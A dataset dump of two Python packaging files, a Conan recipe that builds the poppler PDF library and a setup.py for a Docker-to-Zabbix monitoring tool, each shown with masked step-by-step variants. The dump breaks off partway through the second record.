code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
import shutil
class LibpopplerConan(ConanFile):
name = "poppler"
version = "0.73.0"
description = "Poppler is a PDF rendering library based on the xpdf-3.0 code base"
topics = ("conan", "libpoppler", "poppler", "pdf")
url = "https://github.com/zehome/conan-poppler"
homepage = "https://poppler.freedesktop.org/"
author = "Laurent Coustet <[email protected]>"
license = "GPL-3.0-only"
generators = "cmake"
exports_sources = "CMakeLists.txt", "patches/*.diff"
settings = "os", "compiler", "build_type", "arch"
_source_subfolder = "poppler-src"
options = {
"shared": [True, False], "with_lcms": [True, False],
"with_cpp": [True, False], "with_cairo": [True, False],
"with_qt": [True, False], "with_splash": [True, False],
"with_curl": [True, False],
}
default_options = (
"shared=False", "with_qt=False", "with_lcms=False", "with_cpp=False",
"with_cairo=False", "with_curl=False",
#LC: Specific
# "libpng:shared=False",
# "freetype:with_png=False", "freetype:shared=False",
# "freetype:with_zlib=False", "freetype:with_bzip2=False",
# "zlib:shared=False",
# "openjpeg:shared=False",
# "cairo:shared=False",
# "glib:shared=False",
# "libcurl:shared=False", "OpenSSL:shared=False",
"qt:opengl=desktop", "qt:qtxmlpatterns=True", "qt:shared=True",
)
requires = (
"zlib/1.2.11@conan/stable",
"libpng/1.6.36@bincrafters/stable",
"libjpeg/9c@bincrafters/stable",
"openjpeg/2.3.0@bincrafters/stable",
"libtiff/4.0.9@bincrafters/stable",
"freetype/2.9.1@clarisys/stable",
)
def config_options(self):
if self.settings.os == "Windows":
self.options.remove("cairo")
def configure(self):
if self.options.with_lcms:
self.requires.add("lcms/2.9@bincrafters/stable")
if self.options.with_qt:
self.requires.add("qt/5.12.0@clarisys/stable")
if self.settings.os != "Windows" and self.options.with_cairo:
self.requires.add("cairo/1.15.14@bincrafters/stable")
self.requires.add("glib/2.56.1@bincrafters/stable")
if self.settings.os == "Windows" and not self.options.with_splash:
raise ConanInvalidConfiguration("Option with_splash=True is mandatory on windows")
if self.options.with_curl: # TODO: does not link on windows / shared=False
self.requires.add("libcurl/7.61.1@bincrafters/stable")
# if self.settings.os != "Windows":
# self.requires.add("fontconfig/2.13.1@clarisys/stable")
def source(self):
source_url = "https://poppler.freedesktop.org/"
tools.get("{0}/poppler-{1}.tar.xz".format(source_url, self.version))
extracted_dir = self.name + "-" + self.version
if os.path.exists(self._source_subfolder):
shutil.rmtree(self._source_subfolder)
os.rename(extracted_dir, self._source_subfolder)
# TODO: Ugly.. May need to be replaced by something
# better
os.rename(os.path.join(self._source_subfolder, "CMakeLists.txt"),
os.path.join(self._source_subfolder, "CMakeListsOriginal.txt"))
shutil.copy("CMakeLists.txt",
os.path.join(self._source_subfolder, "CMakeLists.txt"))
def _configure_cmake(self):
cmake = CMake(self)
cmake.verbose = True
cmake.definitions["ENABLE_SPLASH"] = self.options.with_splash
cmake.definitions["ENABLE_ZLIB"] = True
cmake.definitions["BUILD_QT5_TESTS"] = False
cmake.definitions["ENABLE_CPP"] = self.options.with_cpp
cmake.definitions["ENABLE_CMS"] = "lcms2" if self.options.with_lcms else 'none'
cmake.definitions["ENABLE_LIBCURL"] = self.options.with_curl
if self.settings.os == "Windows":
cmake.definitions["LIB_SUFFIX"] = ""
cmake.definitions["FONT_CONFIGURATION"] = "win32"
cmake.definitions["BUILD_SHARED_LIBS"] = self.options.shared
cmake.configure(source_folder=self._source_subfolder)
return cmake
def build(self):
cmake = self._configure_cmake()
#shutil.rmtree(os.path.join(self._source_subfolder, 'cmake'))
cmake.build()
def package(self):
self.copy(pattern="LICENSE", dst="licenses", src=self._source_subfolder)
cmake = self._configure_cmake()
cmake.install()
# If the CMakeLists.txt has a proper install method, the steps below may be redundant
# If so, you can just remove the lines below
include_folder = os.path.join(self._source_subfolder, "include")
self.copy(pattern="*", dst="include", src=include_folder)
self.copy(pattern="*.dll", dst="bin", keep_path=False)
self.copy(pattern="*.lib", dst="lib", keep_path=False)
self.copy(pattern="*.a", dst="lib", keep_path=False)
self.copy(pattern="*.so*", dst="lib", keep_path=False)
self.copy(pattern="*.dylib", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
|
normal
|
{
"blob_id": "848394e1e23d568f64df8a98527a8e177b937767",
"index": 3380,
"step-1": "<mask token>\n\n\nclass LibpopplerConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def config_options(self):\n if self.settings.os == 'Windows':\n self.options.remove('cairo')\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add('lcms/2.9@bincrafters/stable')\n if self.options.with_qt:\n self.requires.add('qt/5.12.0@clarisys/stable')\n if self.settings.os != 'Windows' and self.options.with_cairo:\n self.requires.add('cairo/1.15.14@bincrafters/stable')\n self.requires.add('glib/2.56.1@bincrafters/stable')\n if self.settings.os == 'Windows' and not self.options.with_splash:\n raise ConanInvalidConfiguration(\n 'Option with_splash=True is mandatory on windows')\n if self.options.with_curl:\n self.requires.add('libcurl/7.61.1@bincrafters/stable')\n <mask token>\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions['ENABLE_SPLASH'] = self.options.with_splash\n cmake.definitions['ENABLE_ZLIB'] = True\n cmake.definitions['BUILD_QT5_TESTS'] = False\n cmake.definitions['ENABLE_CPP'] = self.options.with_cpp\n cmake.definitions['ENABLE_CMS'\n ] = 'lcms2' if self.options.with_lcms else 'none'\n cmake.definitions['ENABLE_LIBCURL'] = self.options.with_curl\n if self.settings.os == 'Windows':\n cmake.definitions['LIB_SUFFIX'] = ''\n cmake.definitions['FONT_CONFIGURATION'] = 'win32'\n cmake.definitions['BUILD_SHARED_LIBS'] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n <mask token>\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-2": "<mask token>\n\n\nclass LibpopplerConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def config_options(self):\n if self.settings.os == 'Windows':\n self.options.remove('cairo')\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add('lcms/2.9@bincrafters/stable')\n if self.options.with_qt:\n self.requires.add('qt/5.12.0@clarisys/stable')\n if self.settings.os != 'Windows' and self.options.with_cairo:\n self.requires.add('cairo/1.15.14@bincrafters/stable')\n self.requires.add('glib/2.56.1@bincrafters/stable')\n if self.settings.os == 'Windows' and not self.options.with_splash:\n raise ConanInvalidConfiguration(\n 'Option with_splash=True is mandatory on windows')\n if self.options.with_curl:\n self.requires.add('libcurl/7.61.1@bincrafters/stable')\n\n def source(self):\n source_url = 'https://poppler.freedesktop.org/'\n tools.get('{0}/poppler-{1}.tar.xz'.format(source_url, self.version))\n extracted_dir = self.name + '-' + self.version\n if os.path.exists(self._source_subfolder):\n shutil.rmtree(self._source_subfolder)\n os.rename(extracted_dir, self._source_subfolder)\n os.rename(os.path.join(self._source_subfolder, 'CMakeLists.txt'),\n os.path.join(self._source_subfolder, 'CMakeListsOriginal.txt'))\n shutil.copy('CMakeLists.txt', os.path.join(self._source_subfolder,\n 'CMakeLists.txt'))\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions['ENABLE_SPLASH'] = self.options.with_splash\n cmake.definitions['ENABLE_ZLIB'] = True\n cmake.definitions['BUILD_QT5_TESTS'] = False\n cmake.definitions['ENABLE_CPP'] = self.options.with_cpp\n cmake.definitions['ENABLE_CMS'\n ] = 'lcms2' if self.options.with_lcms else 'none'\n cmake.definitions['ENABLE_LIBCURL'] = self.options.with_curl\n if self.settings.os == 'Windows':\n cmake.definitions['LIB_SUFFIX'] = ''\n cmake.definitions['FONT_CONFIGURATION'] = 'win32'\n cmake.definitions['BUILD_SHARED_LIBS'] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n <mask token>\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-3": "<mask token>\n\n\nclass LibpopplerConan(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def config_options(self):\n if self.settings.os == 'Windows':\n self.options.remove('cairo')\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add('lcms/2.9@bincrafters/stable')\n if self.options.with_qt:\n self.requires.add('qt/5.12.0@clarisys/stable')\n if self.settings.os != 'Windows' and self.options.with_cairo:\n self.requires.add('cairo/1.15.14@bincrafters/stable')\n self.requires.add('glib/2.56.1@bincrafters/stable')\n if self.settings.os == 'Windows' and not self.options.with_splash:\n raise ConanInvalidConfiguration(\n 'Option with_splash=True is mandatory on windows')\n if self.options.with_curl:\n self.requires.add('libcurl/7.61.1@bincrafters/stable')\n\n def source(self):\n source_url = 'https://poppler.freedesktop.org/'\n tools.get('{0}/poppler-{1}.tar.xz'.format(source_url, self.version))\n extracted_dir = self.name + '-' + self.version\n if os.path.exists(self._source_subfolder):\n shutil.rmtree(self._source_subfolder)\n os.rename(extracted_dir, self._source_subfolder)\n os.rename(os.path.join(self._source_subfolder, 'CMakeLists.txt'),\n os.path.join(self._source_subfolder, 'CMakeListsOriginal.txt'))\n shutil.copy('CMakeLists.txt', os.path.join(self._source_subfolder,\n 'CMakeLists.txt'))\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions['ENABLE_SPLASH'] = self.options.with_splash\n cmake.definitions['ENABLE_ZLIB'] = True\n cmake.definitions['BUILD_QT5_TESTS'] = False\n cmake.definitions['ENABLE_CPP'] = self.options.with_cpp\n cmake.definitions['ENABLE_CMS'\n ] = 'lcms2' if self.options.with_lcms else 'none'\n cmake.definitions['ENABLE_LIBCURL'] = self.options.with_curl\n if self.settings.os == 'Windows':\n cmake.definitions['LIB_SUFFIX'] = ''\n cmake.definitions['FONT_CONFIGURATION'] = 'win32'\n cmake.definitions['BUILD_SHARED_LIBS'] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern='LICENSE', dst='licenses', src=self._source_subfolder\n )\n cmake = self._configure_cmake()\n cmake.install()\n include_folder = os.path.join(self._source_subfolder, 'include')\n self.copy(pattern='*', dst='include', src=include_folder)\n self.copy(pattern='*.dll', dst='bin', keep_path=False)\n self.copy(pattern='*.lib', dst='lib', keep_path=False)\n self.copy(pattern='*.a', dst='lib', keep_path=False)\n self.copy(pattern='*.so*', dst='lib', keep_path=False)\n self.copy(pattern='*.dylib', dst='lib', keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-4": "<mask token>\n\n\nclass LibpopplerConan(ConanFile):\n name = 'poppler'\n version = '0.73.0'\n description = (\n 'Poppler is a PDF rendering library based on the xpdf-3.0 code base')\n topics = 'conan', 'libpoppler', 'poppler', 'pdf'\n url = 'https://github.com/zehome/conan-poppler'\n homepage = 'https://poppler.freedesktop.org/'\n author = 'Laurent Coustet <[email protected]>'\n license = 'GPL-3.0-only'\n generators = 'cmake'\n exports_sources = 'CMakeLists.txt', 'patches/*.diff'\n settings = 'os', 'compiler', 'build_type', 'arch'\n _source_subfolder = 'poppler-src'\n options = {'shared': [True, False], 'with_lcms': [True, False],\n 'with_cpp': [True, False], 'with_cairo': [True, False], 'with_qt':\n [True, False], 'with_splash': [True, False], 'with_curl': [True, False]\n }\n default_options = ('shared=False', 'with_qt=False', 'with_lcms=False',\n 'with_cpp=False', 'with_cairo=False', 'with_curl=False',\n 'qt:opengl=desktop', 'qt:qtxmlpatterns=True', 'qt:shared=True')\n requires = ('zlib/1.2.11@conan/stable',\n 'libpng/1.6.36@bincrafters/stable', 'libjpeg/9c@bincrafters/stable',\n 'openjpeg/2.3.0@bincrafters/stable',\n 'libtiff/4.0.9@bincrafters/stable', 'freetype/2.9.1@clarisys/stable')\n\n def config_options(self):\n if self.settings.os == 'Windows':\n self.options.remove('cairo')\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add('lcms/2.9@bincrafters/stable')\n if self.options.with_qt:\n self.requires.add('qt/5.12.0@clarisys/stable')\n if self.settings.os != 'Windows' and self.options.with_cairo:\n self.requires.add('cairo/1.15.14@bincrafters/stable')\n self.requires.add('glib/2.56.1@bincrafters/stable')\n if self.settings.os == 'Windows' and not self.options.with_splash:\n raise ConanInvalidConfiguration(\n 'Option with_splash=True is mandatory on windows')\n if self.options.with_curl:\n self.requires.add('libcurl/7.61.1@bincrafters/stable')\n\n def source(self):\n source_url = 'https://poppler.freedesktop.org/'\n tools.get('{0}/poppler-{1}.tar.xz'.format(source_url, self.version))\n extracted_dir = self.name + '-' + self.version\n if os.path.exists(self._source_subfolder):\n shutil.rmtree(self._source_subfolder)\n os.rename(extracted_dir, self._source_subfolder)\n os.rename(os.path.join(self._source_subfolder, 'CMakeLists.txt'),\n os.path.join(self._source_subfolder, 'CMakeListsOriginal.txt'))\n shutil.copy('CMakeLists.txt', os.path.join(self._source_subfolder,\n 'CMakeLists.txt'))\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions['ENABLE_SPLASH'] = self.options.with_splash\n cmake.definitions['ENABLE_ZLIB'] = True\n cmake.definitions['BUILD_QT5_TESTS'] = False\n cmake.definitions['ENABLE_CPP'] = self.options.with_cpp\n cmake.definitions['ENABLE_CMS'\n ] = 'lcms2' if self.options.with_lcms else 'none'\n cmake.definitions['ENABLE_LIBCURL'] = self.options.with_curl\n if self.settings.os == 'Windows':\n cmake.definitions['LIB_SUFFIX'] = ''\n cmake.definitions['FONT_CONFIGURATION'] = 'win32'\n cmake.definitions['BUILD_SHARED_LIBS'] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern='LICENSE', dst='licenses', src=self._source_subfolder\n )\n cmake = self._configure_cmake()\n cmake.install()\n include_folder = os.path.join(self._source_subfolder, 'include')\n self.copy(pattern='*', dst='include', src=include_folder)\n self.copy(pattern='*.dll', dst='bin', keep_path=False)\n self.copy(pattern='*.lib', dst='lib', keep_path=False)\n self.copy(pattern='*.a', dst='lib', keep_path=False)\n self.copy(pattern='*.so*', dst='lib', keep_path=False)\n self.copy(pattern='*.dylib', dst='lib', keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\nimport shutil\n\n\nclass LibpopplerConan(ConanFile):\n name = \"poppler\"\n version = \"0.73.0\"\n description = \"Poppler is a PDF rendering library based on the xpdf-3.0 code base\"\n topics = (\"conan\", \"libpoppler\", \"poppler\", \"pdf\")\n url = \"https://github.com/zehome/conan-poppler\"\n homepage = \"https://poppler.freedesktop.org/\"\n author = \"Laurent Coustet <[email protected]>\"\n license = \"GPL-3.0-only\"\n generators = \"cmake\"\n exports_sources = \"CMakeLists.txt\", \"patches/*.diff\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n\n _source_subfolder = \"poppler-src\"\n\n options = {\n \"shared\": [True, False], \"with_lcms\": [True, False],\n \"with_cpp\": [True, False], \"with_cairo\": [True, False],\n \"with_qt\": [True, False], \"with_splash\": [True, False],\n \"with_curl\": [True, False],\n }\n default_options = (\n \"shared=False\", \"with_qt=False\", \"with_lcms=False\", \"with_cpp=False\",\n \"with_cairo=False\", \"with_curl=False\",\n #LC: Specific\n # \"libpng:shared=False\",\n # \"freetype:with_png=False\", \"freetype:shared=False\",\n # \"freetype:with_zlib=False\", \"freetype:with_bzip2=False\",\n # \"zlib:shared=False\",\n # \"openjpeg:shared=False\",\n # \"cairo:shared=False\",\n # \"glib:shared=False\",\n # \"libcurl:shared=False\", \"OpenSSL:shared=False\",\n \"qt:opengl=desktop\", \"qt:qtxmlpatterns=True\", \"qt:shared=True\",\n )\n\n requires = (\n \"zlib/1.2.11@conan/stable\",\n \"libpng/1.6.36@bincrafters/stable\",\n \"libjpeg/9c@bincrafters/stable\",\n \"openjpeg/2.3.0@bincrafters/stable\",\n \"libtiff/4.0.9@bincrafters/stable\",\n \"freetype/2.9.1@clarisys/stable\",\n )\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n self.options.remove(\"cairo\")\n\n def configure(self):\n if self.options.with_lcms:\n self.requires.add(\"lcms/2.9@bincrafters/stable\")\n if self.options.with_qt:\n self.requires.add(\"qt/5.12.0@clarisys/stable\")\n if self.settings.os != \"Windows\" and self.options.with_cairo:\n self.requires.add(\"cairo/1.15.14@bincrafters/stable\")\n self.requires.add(\"glib/2.56.1@bincrafters/stable\")\n if self.settings.os == \"Windows\" and not self.options.with_splash:\n raise ConanInvalidConfiguration(\"Option with_splash=True is mandatory on windows\")\n if self.options.with_curl: # TODO: does not link on windows / shared=False\n self.requires.add(\"libcurl/7.61.1@bincrafters/stable\")\n # if self.settings.os != \"Windows\":\n # self.requires.add(\"fontconfig/2.13.1@clarisys/stable\")\n\n\n def source(self):\n source_url = \"https://poppler.freedesktop.org/\"\n tools.get(\"{0}/poppler-{1}.tar.xz\".format(source_url, self.version))\n extracted_dir = self.name + \"-\" + self.version\n\n if os.path.exists(self._source_subfolder):\n shutil.rmtree(self._source_subfolder)\n os.rename(extracted_dir, self._source_subfolder)\n # TODO: Ugly.. May need to be replaced by something\n # better\n os.rename(os.path.join(self._source_subfolder, \"CMakeLists.txt\"),\n os.path.join(self._source_subfolder, \"CMakeListsOriginal.txt\"))\n shutil.copy(\"CMakeLists.txt\",\n os.path.join(self._source_subfolder, \"CMakeLists.txt\"))\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.verbose = True\n cmake.definitions[\"ENABLE_SPLASH\"] = self.options.with_splash\n cmake.definitions[\"ENABLE_ZLIB\"] = True\n cmake.definitions[\"BUILD_QT5_TESTS\"] = False\n cmake.definitions[\"ENABLE_CPP\"] = self.options.with_cpp\n cmake.definitions[\"ENABLE_CMS\"] = \"lcms2\" if self.options.with_lcms else 'none'\n cmake.definitions[\"ENABLE_LIBCURL\"] = self.options.with_curl\n if self.settings.os == \"Windows\":\n cmake.definitions[\"LIB_SUFFIX\"] = \"\"\n cmake.definitions[\"FONT_CONFIGURATION\"] = \"win32\"\n cmake.definitions[\"BUILD_SHARED_LIBS\"] = self.options.shared\n cmake.configure(source_folder=self._source_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n #shutil.rmtree(os.path.join(self._source_subfolder, 'cmake'))\n cmake.build()\n\n def package(self):\n self.copy(pattern=\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n cmake = self._configure_cmake()\n cmake.install()\n # If the CMakeLists.txt has a proper install method, the steps below may be redundant\n # If so, you can just remove the lines below\n include_folder = os.path.join(self._source_subfolder, \"include\")\n self.copy(pattern=\"*\", dst=\"include\", src=include_folder)\n self.copy(pattern=\"*.dll\", dst=\"bin\", keep_path=False)\n self.copy(pattern=\"*.lib\", dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.a\", dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.so*\", dst=\"lib\", keep_path=False)\n self.copy(pattern=\"*.dylib\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n",
"step-ids": [
6,
7,
8,
9,
11
]
}
|
[
6,
7,
8,
9,
11
] |
#!/usr/bin/env python
import os
import sys
from setuptools import setup
from textwrap import dedent
NAME = "docker-zabbix-script-sender"
GITHUB_ORG_URL = "https://github.com/troptop/"
ROOT_DIR = os.path.dirname(__file__)
SOURCE_DIR = os.path.join(ROOT_DIR)
exec(open('docker_zabbix_script_sender/version.py').read())
setup(
name=NAME,
version=version,
author="Cyril Moreau",
author_email="[email protected]",
url= GITHUB_ORG_URL + '/' + NAME,
download_url="{0}/{1}/tarball/v{2}".format(GITHUB_ORG_URL, NAME, version),
description="Push Docker containers script results to Zabbix efficiently",
long_description=dedent("""
Rationale
---------
Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.
It leverages 3 interesting components:
- Zabbix maintains a tool titled ``zabbix-sender``.
It is meant to push `Zabbix trapper items`_ efficiently.
- Develop your own scripts to monitor your docker container
- Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.
It allows the client to subscribe to a live feed delivering a container statistics.
The daemon script stands in the middle of those 3 components.
It collects Docker containers statistics and transforms them in Zabbix trapper events.
Published metrics
-----------------
The daemon script does not publish any statistic yet.
You have to develop your own script
Documentation
-------------
The stable documentation is available on ReadTheDocs_
"""),
keywords="docker zabbix monitoring",
packages=['docker_zabbix_script_sender'],
install_requires=[
'docker-py >= 1.0.0',
],
zip_safe=False,
license="Apache license version 2.0",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Topic :: Utilities',
'License :: OSI Approved :: Apache Software License',
],
entry_points = """
[console_scripts]
docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run
"""
)
|
normal
|
{
"blob_id": "0769003c248c099da5bcd75541d35234b01af5de",
"index": 2723,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-3": "<mask token>\nNAME = 'docker-zabbix-script-sender'\nGITHUB_ORG_URL = 'https://github.com/troptop/'\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-4": "import os\nimport sys\nfrom setuptools import setup\nfrom textwrap import dedent\nNAME = 'docker-zabbix-script-sender'\nGITHUB_ORG_URL = 'https://github.com/troptop/'\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\nexec(open('docker_zabbix_script_sender/version.py').read())\nsetup(name=NAME, version=version, author='Cyril Moreau', author_email=\n '[email protected]', url=GITHUB_ORG_URL + '/' + NAME,\n download_url='{0}/{1}/tarball/v{2}'.format(GITHUB_ORG_URL, NAME,\n version), description=\n 'Push Docker containers script results to Zabbix efficiently',\n long_description=dedent(\n \"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"\n ), keywords='docker zabbix monitoring', packages=[\n 'docker_zabbix_script_sender'], install_requires=['docker-py >= 1.0.0'],\n zip_safe=False, license='Apache license version 2.0', classifiers=[\n 'Development Status :: 4 - Beta', 'Environment :: Other Environment',\n 'Intended Audience :: Developers', 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4', 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License'], entry_points=\n \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n )\n",
"step-5": "#!/usr/bin/env python\nimport os\nimport sys\nfrom setuptools import setup\nfrom textwrap import dedent\n\nNAME = \"docker-zabbix-script-sender\"\nGITHUB_ORG_URL = \"https://github.com/troptop/\"\nROOT_DIR = os.path.dirname(__file__)\nSOURCE_DIR = os.path.join(ROOT_DIR)\n\nexec(open('docker_zabbix_script_sender/version.py').read())\n\nsetup(\n name=NAME,\n version=version,\n author=\"Cyril Moreau\",\n author_email=\"[email protected]\",\n url= GITHUB_ORG_URL + '/' + NAME,\n download_url=\"{0}/{1}/tarball/v{2}\".format(GITHUB_ORG_URL, NAME, version),\n description=\"Push Docker containers script results to Zabbix efficiently\",\n long_description=dedent(\"\"\"\n Rationale\n ---------\n Docker Zabbix Sender delivers a daemon script that push to Zabbix statistics about Docker containers.\n\n It leverages 3 interesting components:\n\n - Zabbix maintains a tool titled ``zabbix-sender``.\n It is meant to push `Zabbix trapper items`_ efficiently.\n\n\t- Develop your own scripts to monitor your docker container\n\n - Docker 1.5.0 comes with Docker Remote API version 17, providing a new `stats endpoint`_.\n It allows the client to subscribe to a live feed delivering a container statistics.\n\n The daemon script stands in the middle of those 3 components.\n It collects Docker containers statistics and transforms them in Zabbix trapper events.\n\n Published metrics\n -----------------\n The daemon script does not publish any statistic yet.\n\tYou have to develop your own script\n\n Documentation\n -------------\n The stable documentation is available on ReadTheDocs_\n\n \"\"\"),\n keywords=\"docker zabbix monitoring\",\n packages=['docker_zabbix_script_sender'],\n install_requires=[\n 'docker-py >= 1.0.0',\n ],\n zip_safe=False,\n license=\"Apache license version 2.0\",\n classifiers=[\n 